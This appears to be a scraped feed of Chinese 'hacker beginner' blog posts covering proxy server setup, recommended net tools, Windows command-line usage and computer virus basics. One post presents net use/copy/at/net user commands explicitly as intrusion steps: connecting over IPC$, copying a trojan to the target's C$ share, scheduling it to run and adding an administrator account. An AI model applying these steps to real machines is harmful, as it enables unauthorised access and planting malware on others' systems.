　　代理服务器处在客户机和服务器之间，对于远程服务器而言，代理服务器是客户机，它向服务器提出各种服务申请；对于客户机而言，代理服务器则是服务器，它接受客户机提出的申请并提供相应的服务。也就是说，客户机访问因特网时所发出的请求不再直接发送到远程服务器，而是被送到了代理服务器上，代理服务器再向远程的服务器提出相应的申请，接收远程服务器提供的数据并保存在自己的硬盘上，然后用这些数据对客户机提供相应的服务。
第二步 使用代理服务器的好处　　对于使用代理服务器上网的用户来说，合理设置并使用它有很多好处。
　　１、能加快对网络的浏览速度
　　代理服务器接收远程服务器提供的数据保存在自己的硬盘上，如果有许多用户同时使用这一个代理服务器，他们对因特网站点所有的要求都会经由这台代理服务器，当有人访问过某一站点后，所访问站点上的内容便会被保存在代理服务器的硬盘上，如果下一次再有人访问这个站点，这些内容便会直接从代理服务中获取，而不必再次连接远程服务器。因此，它可以节约带宽、提高访问速度。
　　２、节省IP开销
　　使用代理服务器时，所有用户对外只占用一个IP，所以不必租用过多的IP地址，降低网络的维护成本。
　　３、可以作为防火墙
　　代理服务器可以保护局域网的安全，起到防火墙的作用：对于使用代理服务器的局域网来说，在外部看来只有代理服务器是可见的，其他局域网的用户对外是不可见的，代理服务器为局域网的安全起到了屏障的作用。另外，通过代理服务器，用户可以设置IP地址过滤，限制内部网对外部的访问权限。同样，代理服务器也可以用来限制封锁IP地址，禁止用户对某些网页的访问。
　　４、提高访问速度
　　通常代理服务器都设置一个较大的硬盘缓冲区(可能高达几个GB或更大)，当有外界的信息通过时，同时也将其保存到缓冲区中，当其他用户再访问相同的信息时，则直接由缓冲区中取出信息，传给用户，以提高访问速度。
　　５、方便对用户的管理
　　通过代理服务器，用户可以设置用户验证和记帐功能，对用户进行记帐，没有登记的用户无权通过代理服务器访问Internet网。并对用户的访问时间、访问地点、信息流量进行统计。
第三步 代理服务器的工作原理　　首先，笔者要向大家声明的是，代理服务器与专线接入中用到的路由器是两个不同的概念。
　　代理服务器是建立在ＴＣＰ／ＩＰ协议应用层上的一种服务软件，而路由器则是连接在网络中的一台硬件设备，它是工作在ＴＣＰ／ＩＰ协议的ＩＰ层上，主要起寻径作用。
　　代理服务器软件一般安装在一台性能比较突出且装有调制解调器和网卡的计算机上。在内部局域网中的每一台客户机都必须拥有一个独立的ＩＰ地址，而且事先必须在客户机软件上配置使用代理服务器并指向代理服务器的ＩＰ地址和服务端口号。
　　当代理服务器启动时，将利用一个名为ＷＩＮＳＯＣＫ的动态连接程序来开辟一个指定的端口，等待用户的访问请求。
　　假设，我们要访问一个站点，首先使代理服务器通过调制解调器拨号连上ＩＳＰ，然后在客户机上发出信息请求，这个请求自动通过ＷＩＮＳＯＣＫ套接程序和代理服务器取得联系。代理服务器在指定的端口接收到客户机的请求后，它就分析客户机需要的是什么样的服务，如果是ＦＴＰ服务，它首先查看本地计算机上有没有相应的信息，如果有，它就从本地的硬盘中把客户机需求的信息返回给客户机；如果没有，它就通过调制解调器把客户机的请求发送到ＩＳＰ，当代理服务器收到ＩＳＰ传回的响应以后，它就直接把响应的信息转发给内部网络上的客户机。
　　以后，其他的客户机访问相同的信息时，就不用和ＩＳＰ进行联系，直接从代理服务器上就可以取得信息了。通过代理服务器可以使公司内部网络与ＩＮＴＥＲＮＥＴ实现安全连接。
第四步 代理服务器的具体配置（一）　　代理服务器的配置包括两个部分：服务器端与客户端。
　　服务器端的配置包括用户的创建、管理、监控，帐号的统计、分析与查询等设置。但这项工作通常是由因特网服务商负责或者是由专门的网络管理员来做的，对于我们普通的拨号用户来说，代理服务器的配置其实就是指客户端的配置。
　　客户端的设置主要是在浏览器上配置代理服务器，从而能够利用代理服务器提供的功能，不同的浏览器的配置方式不同。下面笔者就以常见的几种浏览器为例，分别叙述各个浏览器是如何来使用代理服务器功能的。
[!--empirenews.page--]
　　１、Netscape Navigator 3.x中的配置
　　Ａ、启动Netscape Navigator 3.x浏览器程序之后，在菜单栏中单击“Options”（选项）菜单下的“Network Preferences”（网络设置）菜单项，浏览器会弹出一个标题为“Preferences”的对话框，如图１所示。
[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/4217c8bb52d2f3d7ef2b33ec05901a5d[1].jpg[/img]500)this.width=500" border=0>图1

　　Ｂ、该对话框共有５个标签，用户只要在该对话框中单击“Proxies”（代理）标签，在该标签中选择“Manual Proxy Configuration”（手工代理配置）这一单选项。

　　Ｃ、接着用户单击该对话框中的“View”（查看）按钮，程序会弹出一个代理服务器设置对话框，如图２所示。
[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/788410e684617c151e516b192f5e7de9[1].jpg[/img]500)this.width=500" border=0>图2

　　在这个对话框中分别设置FTP、Gopher、HTTP以及其他服务的代理服务器，通常最常用的一项就是ＨＴＴＰ代理，在ＨＴＴＰ对应的文本栏中输入你想要的代理服务器的ＩＰ地址或计算机名字就行了，例如在这里输入的ＨＴＴＰ代理服务器的ＩＰ地址为２１０.７３.１４０.２，“Port”称为服务“端口”，通常代理服务器的端口为8080。

　　Ｄ、上述参数设置好后，最后单击“确定”按钮返回到Netscape Navigator３.Ｘ浏览器操作窗口界面中。
第五步 代理服务器的具体配置（二）

Netscape Communicator 4.x中的配置

　　Ａ、打开Netscape Communicator 4.x浏览器操作界面，在菜单栏中单击“Edit”菜单下的“Preferences”菜单项，弹出如图３所示的对话框。

[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/2b7a70386c759e5779d4c4c03e9f0225[1].jpg[/img]500)this.width=500" border=0>图3

　　Ｂ、在该对话框的目录栏中选择“Advanced”（高级）目录，并用鼠标单击“Advanced”旁边的“＋”符号，打开下面的子项，然后单击其中一个子项是“Proxies”，这时大家会发现出现一个与图一一样的设置对话框。

　　Ｃ、按照Netscape Navigator 3.x中的配置，单击“Manual Proxy Configuration”这一单选项，然后单击“View”按钮，弹出图２中的对话框，分别在各个文本框中输入代理服务器的ＩＰ地址或者计算机的名字，在每个“Port”框中都输入8080。

　　Ｄ、最后单击“确定”按钮，完成后面的参数设置工作。
第六步 代理服务器的具体配置（三）

在Internet Explorer ３～4.x中的配置

　　IE 3.x与IE 4.x中代理服务器的配置基本相同，具体步骤如下：

　　Ａ、打开ＩＥ３～４.Ｘ浏览器窗口，在菜单栏中单击“查看”菜单中的“Internet选项”菜单项，程序会弹出一个标题为“选项”对话框，如图４所示。
[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/bac3107aceaa8c2766ea1420b3ab3b0e[1].jpg[/img]500)this.width=500" border=0>图4

　　Ｂ、在该对话框中，用鼠标单击“连接”标签，在这个对话框中用户要选定“通过代理服务器连接”这一复选项。

　　Ｃ、接着用鼠标单击“设置”按钮，打开了如图５所示的代理服务器设置对话框。按照上面的参数设置方法输入你需要的代理服务器参数。

[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/07a521e58dc2992309d3aa44e9a3b18f[1].jpg[/img]500)this.width=500" border=0>图5

　　Ｄ、设置好后，单击“确定”按钮返回浏览器主操作窗口界面。　
第七步 代理服务器的具体配置（四）
[!--empirenews.page--]
在Internet Explorer ５.x中的配置

　　Ａ、运行ＩＥ５.Ｘ浏览器程序，在其浏览操作窗口中单击菜单栏里面的“工具”菜单项，并从弹出的下拉菜单中选择“Internet 选项”，程序将会弹出一个标题为“Internet 选项”的对话框，如图６所示。
[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/36ffa78923bfeb733d1526113f63e63c[1].jpg[/img]500)this.width=500" border=0>图6

　　Ｂ、接着在该对话框中用鼠标选择“连接”标签，打开了如图７所示的设置界面。[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/80c9223ee27121864baeef64cf259d89[1].jpg[/img]500)this.width=500" border=0>
图7

　　Ｃ、在该对话框中的拨号设置栏中，选择自己所使用的拨号连接，并单击旁边的设置按钮，进入到如图8所示的设置窗口。

[img]mk:@MSITStore:E:\新建文件夹\黑客入门之实训连（菜鸟必学课程）（16天）.chm::/22_files/b2e6f83128fa967236e7f888975b3869[1].jpg[/img]500)this.width=500" border=0>图8

在“地址”栏里填入使用的HTTP代理服务器的IP地址或计算机名字，在“端口”栏中填入所使用的代理服务器的端口。

　　D、设置好后，单击“确定”完成所有的设置工作。 ]]> http://78040007.qzone.qq.com/blog/1248929065#comment 134218240 Thu, 30 Jul 2009 04:44:25 GMT http://78040007.qzone.qq.com/blog/1248929065 http://78040007.qzone.qq.com/blog/1248929023

互联网热潮带动软件层出不穷地发展，各式各样的小工具令人无从选择，如果一个一个去试用，那么将花费大量的财力和精力。正是基于以上原因，笔者从众多的网络软件中精选了自己喜爱的5个可以称得上是“必备”的软件介绍给大家，相信有了它们的帮助网络会变得更精彩。

　　可爱的小狐狸——Foxmail
　　网址：www.aerofox.com
　　虽然在Windows中已经集成了邮件处理程序——Outlook Express，但是它的功能似乎对于普通用户而言过于强大，体积、占用系统资源量也都不能令人满意。小巧的国产软件——Foxmail是一款非常不错的邮件工具，最大的好处在于：不需安装即可使用，系统资源占用率低，对中文支持最为出色，可以将信件直接从GB中文转换成BIG5或将BIG5转换为GB进行发送。而且容量小，可功能已足够满足要求，软件制作者在编写这个软件时借鉴、融合了许多同类软件的优点，一般收、发信速度也相当快。

　　勤劳的蚂蚁——Netants
　　网址：www.netants.com
　　现在只有初次上网的“菜鸟”还在使用浏览器下载软件。常在网上逛自然少不了一个专门的下载工具，虽然流行的下载工具多的是，但Netants依然是上网用户的标准配置之一。Netants最大的优势在于它合理的多线程技术，因此用它下载软件的速度相当快。

　　网络加速器——Surfer Express
　　网址：www.softhouse.com.cn
　　网速一直是国内网友最为头痛的问题，因此各种各样的网络加速软件最能吸引人们的视线。笔者推荐Surfer Express，不仅稳定性强，而且还拥有出色的智能缓存，当你对某个网站进行了第一次浏览后，Surfer Express会在一个专门的缓存数据库中为该网站建立一个记录，以后再次浏览时，它就会根据这个记录将网络上的页面与自己Cache中的页面进行比较，并自动选择刷新或显示Cache中的内容。Surfer Express本身的缓存要比浏览器的缓存快6倍，而且它不用像其他同类软件那样，一旦网站有更新还需要按刷新键才行。

　　用自然语言访问网络——3721中文网址
　　网址：www.3721.com
　　网络一直在追求个性化、人性化，对于国人自然要用中文上网最方便，使用时，只要输入“中国电脑教育报”就能到《中国电脑教育报》的主页，而不用记忆网址。不仅可以用中文，还可以用拼音、拼音字头访问网站。

　　让黑客入室无门——LockDown 2000
　　网址：www.softhouse.com.cn
　　网络安全问题越来越重要，如今网上的黑客太多了，一旦发现系统有漏洞，他们乘虚而入……安装一款防火墙或防黑软件是大大的必要，笔者推荐LockDown 2000，不仅可以和局域网中现有的防火墙一起合作，本身也可以作为防火墙使用，防堵并监控来自网络上的各种危机。该软件具有特洛伊木马连接检测、ICQ炸弹保护等功能，可以有效地拦截黑客对你进行的种种攻击。它还可以自动记录下其他局域网或Internet用户连接到你的电脑过程，包括：对方的IP地址、主机名称等信息。
]]> http://78040007.qzone.qq.com/blog/1248929023#comment 134218240 Thu, 30 Jul 2009 04:43:43 GMT http://78040007.qzone.qq.com/blog/1248929023 http://78040007.qzone.qq.com/blog/1248928982 第一节：必学之网络命令(第三章)
要学习网络入侵，首先我们必须学习一些基础的网络命令，我们所谓的基础命令其实也就是WIN 2K，WIN XP系统下的一些DOS命令，这个命令都又CMD.exe来完成
概念部分：
（1）2000、XP下的CMD与98的MS-DOS的不同之处：
cmd.exe叫命令提示符他与98下的MS-DOS是不一样的，所以我们不能将他混为一谈，但是我们却可以用CMD.exe来执行很多DOS命令，例如：dir、cd、del等等！
（2）CMD下的内部命令与外部命令的不同：
CMD下的内部命令就是指：我们可以直接在CMD下就可以执行的命令，例如：telnet、ftp、dir、cd、等等，你可以在CMD下输入help进行查看,外部命令呢，就是cmd下不能直接运行的命令，（例如大家常用的nc）他需要在CMD下切换到他（NC）做在的目录你才能运行NC及NC的命令
实操部分：
(一)：常用入侵防护命令：
Net 、telnet 、at、copy、ftp、finger、del~~~~~~

一些常用的Net命令与例子：
（1）建立IPC连接的命令
Net use //IP/ipc$ “” /user:username
例如：
Net use //127.0.0.1/ipc$ 123456 /user :administrator
这个命令的意思就是与用户名为adminidtrator用户密码为123456的主机127.0.0.1建立ipc$空连接
(2) 删除IPC$空连接
Net use //ip /del
例如：
Net use //127.0.0.1 /del
删除与主机127.0.0.1已经建立的Ipc$连接
(3) 启动关闭服务：
Net start //查看已经开启的服务
Net start servername
Net stop servername
例如：
Net start telnet //开启telnet服务
Net stop telnet //关闭telnet服务
(4)启动关闭共享
Net shate ipc$Content$nbsp; //开启ipc$默认共享
Net share ipc$ /del //关闭ipc$默认共享
Net share c=c:/ //完全共享c盘
Net share d=d:/ //删除完全共享的d盘
(4) 映射硬盘
Net use z: //ip/c$
例如：
Net use z: //127.0.0.1/c$Content$nbsp; //把127.0.0.1的C盘映射成本机的z盘
说明：映射成功后，你在我的电脑里面里面就会多出一个硬盘Z，其实Z就是127.0.0.1的C盘！
Net use z: /del //断开映射
入侵中的作用：把对方的硬盘映射过来以后我们就能直接复制文件到对方的硬盘下面了
成功实现的条件：必须与对方建立ipc$连接
(5) 远程复制文件_Copy
Copy e:/3389.exe //127.0.0.1/c$Content$nbsp; //将本地的E盘下的3389.exe这个文件copy到对方系统的C盘根目录下
Copy在入侵中的作用：把本地文件复制到对方硬盘
Copy复制成功所需的条件：必须与主机建立ipc$连接
(6) 查看远程系统的时间
Net time //IP
Net time //127.0.0.1 //查看远程主机127.0.0.1的本地时间
作用：得到对方时间好为自己计划任务种下木马做准备
(7) 远程运行程序
At //ip time server.exe
At //127.0.0.1 12:30 c:/server.exe //让主机在中午12:30分运行我们已经复制到他C
盘根目录下的木马server.exe
在入侵中作用：这样我们就可以用我们的木马服务端来连接我们木马，，更好的使用图形方式来控制肉鸡
（8）添加管理员帐号：
Net user username 1234 /add //添加一个密码为1234名字为 username的用户
Net localgroup administrators juntuan /add //把username这个用户添加到管 理员组
注意：有些系统的管理员组不是administrators你要根据实际情况来改，不过99.9%的系统的管理员组还是administrators的。
修改用户密码：
Net user username 1234 //把用户username的密码修改成1233。
（9）远程登陆主机_telnet
telnet IP port
例如：telnet 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口
（当目标主机的端口是默认的23的时候我们不需要+端口即：telnet IP 就好）
（10）传输文件命令_ftp
其实这个我个人觉得用途不大，毕竟当你拿到了FTP密码之后你可以用flashftp或者cutftp有一个图形截面的交互如何不好呢？
首先在CMD里面输入ftp
然后输入：open IP port
例如：open 127.0.0.1 1234 //连接登陆127.0.0.1的1234端口
如何开启windows系统自带的ftp服务：
Net start msftppsvc
(11) 查看文件夹的属性_cacls
Cacls xiaod //查看xiaod这个文件夹的属性
参数说明：F：（完全控制）R：（只读）C：（允许更改）W：（允许写入）N：（没有任何权限）
(12) 删除文件_del
Del是用来删除文件命令
首先进入你想删除的文件的目录
Del xiaod.txt //删除xiaod.txt这个个文件
Del xiaod.txt /f //强制删除xiaod.txt这个个文件（当该文件无法正常删除的时候使用该命令）
(13) finger命令
Finger是一个信息刺探命令一般在对方开启了79端口时命令使用
Finger –l user @computer
参数详解： -l 用长列表格式显示消息
User:指定用户的信息
成功实现的条件：对方必须安装tcp/ip协议
(14)：文件写入命令_echo:
Echo 你好 > index.htm //用你好来覆盖index.htm的内容
Echo 你好 >>index.htm //将“你好”添加到index.htm
（15）：写入注册表文件_regedit
Regedit /s filename.reg //s是写入参数
(16)：端口映射_chgport
Chgport 3=5 //将端口3映射到5
Chgport /d* //删除所有端口映射
(17)：文件映射_subst
Subst b:/ c:/winnt //这个时候当你访问硬盘B的时候你就是访问了 c:/winnt目录
(18)：查看当前正在使用的帐号：
Query session //查看帐号
(19)：踢掉指定用：
Logoff id //注意ID，是在用query session查看到的用户的id而不是用户名。
(20)：发送消息给某用户或者内网主机
Net send hostname or /IP message
例如：net send xiaod or /127.0.0.1 hello! ]]> http://78040007.qzone.qq.com/blog/1248928982#comment 134218240 Thu, 30 Jul 2009 04:43:02 GMT http://78040007.qzone.qq.com/blog/1248928982 http://78040007.qzone.qq.com/blog/1248928932 第五节：病毒基本知识之二(第二章)
计算机感染病毒后的主要症状
从目前发现的病毒来看, 主要症状有：

（1）由于病毒程序把自己或操作系统的一部分用坏簇隐起来, 磁盘坏簇莫名其妙地增多。

（2）由于病毒程序附加在可执行程序头尾或插在中间, 使可执行程序容量增大。

（3）由于病毒程序把自己的某个特殊标志作为标签, 使接触到的磁盘出现特别标签。

（4）由于病毒本身或其复制品不断侵占系统空间, 使可用系统空间变小。

（5）由于病毒程序的异常活动, 造成异常的磁盘访问。

（6）由于病毒程序附加或占用引导部分, 使系统导引变慢。

（7）丢失数据和程序。

（8）中断向量发生变化。

（9）打印出现问题。

（10）死机现象增多。

（11）生成不可见的表格文件或特定文件。

（12）系统出现异常动作, 例如：突然死机, 又在无任何外界介入下, 自行起动。

（13）出现一些无意义的画面问候语等显示。

（14）程序运行出现异常现象或不合理的结果。

（15）磁盘的卷标名发生变化。

（16）系统不认识磁盘或硬盘不能引导系统等。

（17）在系统内装有汉字库且汉字库５那榭鱿虏荒艿饔煤鹤挚饣虿荒艽蛴『鹤帧?

（18）在使用写保护的软盘时屏幕上出现软盘写保护的提示。

（19）异常要求用户输入口令。



常见电脑病毒发作症状

1. 电脑动作比平常迟钝
2. 程式载入时间比平常久
有些病毒能控制程式或系统的启动程序,当系统刚开始启动或是一个应用程式被载入时,这些病毒将执行他们的动
作,因此会花更多时间来载入程式。
3. 对一个简单的工作,磁碟机似乎花了比预期长的时间.
例如:储存一页的文字若需一秒,但病毒可能会花更多时间来寻找未感染档案。
4. 不寻常的错误讯息出现
例如你可能得到以下的讯息:
write protect error on driver A
表示病毒已经试图去存取磁碟并感染之.特别是当这种讯息出现繁复时,表示你的系统已经中毒了!
5. 硬碟的指示灯无缘无故的亮了.
当你没有存取磁碟,但磁碟机指示灯却亮了,电脑这时已经受到病毒感染了!
6. 系统记忆体容量忽然大量减少
有些病毒会消耗可观的记忆体容量,曾经执行过的程式,再次执行时,突然告诉你没有足够的空间可以利用,表示病
毒已经存在你的电脑中了!
7. 磁碟可利用的空间突然减少
这个讯息警告你病毒已经开始复制了!
8. 可执行档的大小改变了!
正常情况下,这些程式应该维持固定的大小,但有些较不聪明的病毒,会增加程式的大小
9. 坏轨增加
有些病毒会将某些磁区标注为坏轨,而将自己隐藏其中,于是往往扫毒软体也无法检查病毒的存在,例如 Disk Ki_
ller 会寻找 3 或 5 个连续未用的磁区,并将其标示为坏轨。
10. 程式同时存取多部磁碟机
11. 记忆体内增加来路不明的常驻程式
12. 档案奇怪的消失
13. 档案的内容被加一些奇怪的资料
14. 档案名称,副档名,日期,属性被更改过
计算机病毒的破坏行为&127;

计算机病毒的破坏行为体现了病毒的杀伤能力。病毒破坏行为的激烈程度取决于病毒作者的主观愿望和他所具有
的技术能量。数以万计、不断发展扩张的病毒，其破坏行为千奇百怪，不可能穷举其破坏行为，难以做全面的描述。
根据有的病毒资料可以把病毒的破坏目标和攻击部位归纳如下：

1.攻击系统数据区，攻击部位包括：&127;
硬盘主引寻扇区、Boot扇区、FAT表、文件目录。一般来说，攻击系统数据区的病毒是恶性病毒， 受损的数据不易恢
复。&127;

2.攻击文件&127;
病毒对文件的攻击方式很多，可列举如下：删除、改名、替换内容、丢失部分程序代码、内容颠倒、写入时间空白、
变碎片、假冒文件、丢失文件簇、丢失数据文件。&127;

3.攻击内存&127;
内存是计算机的重要资源，也是病毒的攻击目标。病毒额外地占用和消耗系统的内存资源，可以导致一些大程序受阻。
病毒攻击内存的方式如下：占用大量内存、改变内存总量、禁止分配内存、蚕食内存。&127;

4.干扰系统运行&127;
病毒会干扰系统的正常运行，以此做为自己的破坏行为。此类行为也是花样繁多，可以列举下述诸方式：不执行命令、
干扰内部命令的执行、虚假报警、打不开文件、内部栈溢出、占用特殊数据区、换现行盘、时钟倒转、重启动、死机、
强制游戏、扰乱串并行口。&127;

5.速度下降&127;
病毒激活时，其内部的时间延迟程序启动。在时钟中纳入了时间的循环计数，迫使计算机空转，计算机速度明显下降。&127;

6.攻击磁盘&127;
攻击磁盘数据、不写盘、写操作变读操作、写盘时丢字节。

7.扰乱屏幕显示&127;
病毒扰乱屏幕显示的方式很多，可列举如下：字符跌落、环绕、倒置、显示前一屏、光标下跌、滚屏、抖动、乱写、
吃字符。&127;

8.键盘&127;
病毒干扰键盘操作，已发现有下述方式：响铃、封锁键盘、换字、抹掉缓存区字符、重复、输入紊乱。&127;

9.喇叭&127;
许多病毒运行时，会使计算机的喇叭发出响声。有的病毒作者让病毒演奏旋律优美的世界名曲， 在高雅的曲调中去杀
戮人们的信息财富。有的病毒作者通过喇叭发出种种声音。已发现的有以下方式：演奏曲子、警笛声、 炸弹噪声、鸣
叫、咔咔声、嘀嗒声。

10.攻击CMOS&127;
在机器的CMOS区中，保存着系统的重要数据。例如系统时钟、磁盘类型、内存容量等，并具有校验和。 有的病毒激活
时，能够对CMOS区进行写入动作，破坏系统CMOS中的数据。

11.干扰打印机&127;
假报警、间断性打印、更换字符。&127;

计算机病毒的工作过程应包括哪些环节?


计算机病毒的完整工作过程应包括以下几个环节：

（1）传染源：病毒总是依附于某些存储价质, 例如软盘、硬盘等构成传染源。

（2）传染媒介：病毒传染的媒介由工作的环境来定, 可能是计算机网, 也可能是可移动的存储介质, 例如软磁盘等。

（3）病毒激活：是指将病毒装入内存, 并设置触发条件, 一旦触发条件成熟, 病毒就开始作用－－自我复制到传染对象中,
进行各种破坏活动等。

（4）病毒触发：计算机病毒一旦被激活, 立刻就发生作用, 触发的条件是多样化的, 可以是内部时钟, 系统的日期, 用户
标识符，也可能是系统一次通信等等。

（5）病毒表现：表现是病毒的主要目的之一, 有时在屏幕显示出来, 有时则表现为破坏系统数据。可以这样说, 凡是软件
技术能够触发到的地方, 都在其表现范围内。

（6）传染：病毒的传染是病毒性能的一个重要标志。在传染环节中, 病毒复制一个自身副本到传染对象中去。计算机病毒的分类

从第一个病毒出世以来，究竟世界上有多少种病毒，说法不一。无论多少种，病毒的数量仍在不断增加。据国外统
计，计算机病毒以10种/周的速度递增，另据我国公安部统计，国内以4 -6种/月的速度递增。不过，孙悟空再厉害，也
逃不过如来佛的手掌心，病毒再多，也逃不出下列种类。病毒分类是为了更好地了解它们。
按照计算机病毒的特点及特性，计算机病毒的分类方法有许多种。因此，同一种病毒可能有多种不同的分法。

1．按照计算机病毒攻击的系统分类
（1）攻击DOS系统的病毒。这类病毒出现最早、最多，变种也最多，目前我国出现的计算机病毒基本上都是这类病
毒，此类病毒占病毒总数的99％。
（2）攻击Windows系统的病毒。由于Windows的图形用户界面（GUI）和多任务操作系统深受用户的欢迎， Windows
正逐渐取代DOS，从而成为病毒攻击的主要对象。目前发现的首例破坏计算机硬件的CIH病毒就是一个Windows95/98病毒。
（3）攻击UNIX系统的病毒。当前，UNIX系统应用非常广泛，并且许多大型的操作系统均采用 UNIX作为其主要的操
作系统，所以UNIX病毒的出现，对人类的信息处理也是一个严重的威胁。
（4）攻击OS/2系统的病毒。世界上已经发现第一个攻击OS/2系统的病毒，它虽然简单，但也是一个不祥之兆。

2．按照病毒的攻击机型分类
（1）攻击微型计算机的病毒。这是世界上传染最为广泛的一种病毒。
（2）攻击小型机的计算机病毒。小型机的应用范围是极为广泛的，它既可以作为网络的一个节点机， 也可以作为
小的计算机网络的主机。起初，人们认为计算机病毒只有在微型计算机上才能发生而小型机则不会受到病毒的侵扰，但
自1988年11月份Internet网络受到worm程序的攻击后，使得人们认识到小型机也同样不能免遭计算机病毒的攻击。
（3）攻击工作站的计算机病毒。近几年，计算机工作站有了较大的进展，并且应用范围也有了较大的发展， 所以
我们不难想象，攻击计算机工作站的病毒的出现也是对信息系统的一大威胁。

3．按照计算机病毒的链结方式分类
由于计算机病毒本身必须有一个攻击对象以实现对计算机系统的攻击，计算机病毒所攻击的对象是计算机系统可执
行的部分。
（1）源码型病毒
该病毒攻击高级语言编写的程序，该病毒在高级语言所编写的程序编译前插入到原程序中，经编译成为合法程序的
一部分。
（2）嵌入型病毒
这种病毒是将自身嵌入到现有程序中，把计算机病毒的主体程序与其攻击的对象以插入的方式链接。这种计算机病
毒是难以编写的）一旦侵入程序体后也较难消除。如果同时采用多态性病毒技术、超级病毒技术和隐蔽性病毒技术，将
给当前的反病毒技术带来严峻的挑战。
（3）外壳型病毒
外壳型病毒将其自身包围在主程序的四周，对原来的程序不作修改。这种病毒最为常见，易于编写，也易于发现，
一般测试文件的大小即可知。
（4）操作系统型病毒
这种病毒用它自己的程序意图加入或取代部分操作系统进行工作，具有很强的破坏力，可以导致整个系统的瘫痪。
圆点病毒和大麻病毒就是典型的操作系统型病毒。
这种病毒在运行时，用自己的逻辑部分取代操作系统的合法程序模块，根据病毒自身的特点和被替代的操作系统中
合法程序模块在操作系统中运行的地位与作用以及病毒取代操作系统的取代方式等，对操作系统进行破坏。

4。按照计算机病毒的破坏情况分类
按照计算机病毒的破坏情况可分两类：
（1）良性计算机病毒
良性病毒是指其不包含有立即对计算机系统产生直接破坏作用的代码。这类病毒为了表现其存在，只是不停地进行
扩散，从一台计算机传染到另一台，并不破坏计算机内的数据。有些人对这类计算机病毒的传染不以为然，认为这只是
恶作剧，没什么关系。其实良性、恶性都是相对而言的。良性病毒取得系统控制权后，会导致整个系统运行效率降低，
系统可用内存总数减少，使某些应用程序不能运行。它还与操作系统和应用程序争抢CPU的控制权， 时时导致整个系统
死锁，给正常操作带来麻烦。有时系统内还会出现几种病毒交叉感染的现象，一个文件不停地反复被几种病毒所感染。
例如原来只有10KB的文件变成约90KB，就是被几种病毒反复感染了数十次。这不仅消耗掉大量宝贵的磁盘存储空间，而
且整个计算机系统也由于多种病毒寄生于其中而无法正常工作。因此也不能轻视所谓良性病毒对计算机系统造成的损害。
（2）恶性计算机病毒
恶性病毒就是指在其代码中包含有损伤和破坏计算机系统的操作，在其传染或发作时会对系统产生直接的破坏作用。
这类病毒是很多的，如米开朗基罗病毒。当米氏病毒发作时，硬盘的前17个扇区将被彻底破坏，使整个硬盘上的数据无
法被恢复，造成的损失是无法挽回的。有的病毒还会对硬盘做格式化等破坏。这些操作代码都是刻意编写进病毒的，这
是其本性之一。因此这类恶性病毒是很危险的，应当注意防范。所幸防病毒系统可以通过监控系统内的这类异常动作识
别出计算机病毒的存在与否，或至少发出警报提醒用户注意。

5．按照计算机病毒的寄生部位或传染对象分类
传染性是计算机病毒的本质属性，根据寄生部位或传染对象分类，也即根据计算机病毒传染方式进行分类，有以下
几种：
（1）磁盘引导区传染的计算机病毒
磁盘引导区传染的病毒主要是用病毒的全部或部分逻辑取代正常的引导记录，而将正常的引导记录隐藏在磁盘的其
他地方。由于引导区是磁盘能正常使用的先决条件，因此，这种病毒在运行的一开始（如系统启动）就能获得控制权，
其传染性较大。由于在磁盘的引导区内存储着需要使用的重要信息，如果对磁盘上被移走的正常引导记录不进行保护，
则在运行过程中就会导致引导记录的破坏。引导区传染的计算机病毒较多，例如，“大麻”和“小球”病毒就是这类病
毒。
（2）操作系统传染的计算机病毒
操作系统是一个计算机系统得以运行的支持环境，它包括。COM、。EXE等许多可执行程序及程序模块。操作系统传
染的计算机病毒就是利用操作系统中所提供的一些程序及程序模块寄生并传染的。通常，这类病毒作为操作系统的一部
分，只要计算机开始工作，病毒就处在随时被触发的状态。而操作系统的开放性和不绝对完善性给这类病毒出现的可能
性与传染性提供了方便。操作系统传染的病毒目前已广泛存在，“黑色星期五”即为此类病毒。
（3）可执行程序传染的计算机病毒
可执行程序传染的病毒通常寄生在可执行程序中，一旦程序被执行，病毒也就被激活，病毒程序首先被执行，并将
自身驻留内存，然后设置触发条件，进行传染。
对于以上三种病毒的分类，实际上可以归纳为两大类：一类是引导扇区型传染的计算机病毒；另一类是可执行文件
型传染的计算机病毒。

6．按照计算机病毒激活的时间分类
按照计算机病毒激活的时间可分为定时的和随机的。
定时病毒仅在某一特定时间才发作，而随机病毒一般不是由时钟来激活的。

7．按照传播媒介分类
按照计算机病毒的传播媒介来分类，可分为单机病毒和网络病毒。
（1）单机病毒
单机病毒的载体是磁盘，常见的是病毒从软盘传人硬盘，感染系统，然后再传染其他软盘，软盘又传染其他系统。
（2）网络病毒
网络病毒的传播媒介不再是移动式载体，而是网络通道，这种病毒的传染能力更强，破坏力更大。

8．按照寄生方式和传染途径分类
人们习惯将计算机病毒按寄生方式和传染途径来分类。计算机病毒按其寄生方式大致可分为两类，一是引导型病毒，
二是文件型病毒；它们再按其传染途径又可分为驻留内存型和不驻留内存型，驻留内存型按其驻留内存方式又可细分。

混合型病毒集引导型和文件型病毒特性于一体。
引导型病毒会去改写（即一般所说的“感染”）磁盘上的引导扇区（BOOT SECTOR）的内容， 软盘或硬盘都有可能
感染病毒。再不然就是改写硬盘上的分区表（FAT）。如果用已感染病毒的软盘来启动的话，则会感染硬盘。
引导型病毒是一种在ROM BIOS之后，系统引导时出现的病毒，它先于操作系统，依托的环境是BIOS中断服务程序。
引导型病毒是利用操作系统的引导模块放在某个固定的位置，并且控制权的转交方式是以物理地址为依据，而不是以操
作系统引导区的内容为依据，因而病毒占据该物理位置即可获得控制权，而将真正的引导区内容搬家转移或替换，待病
毒程序被执行后，将控制权交给真正的引导区内容，使得这个带病毒的系统看似正常运转，而病毒己隐藏在系统中伺机
传染、发作。
有的病毒会潜伏一段时间， 等到它所设置的日期时才发作。 有的则会在发作时在屏幕上显示一些带有“宣示”或
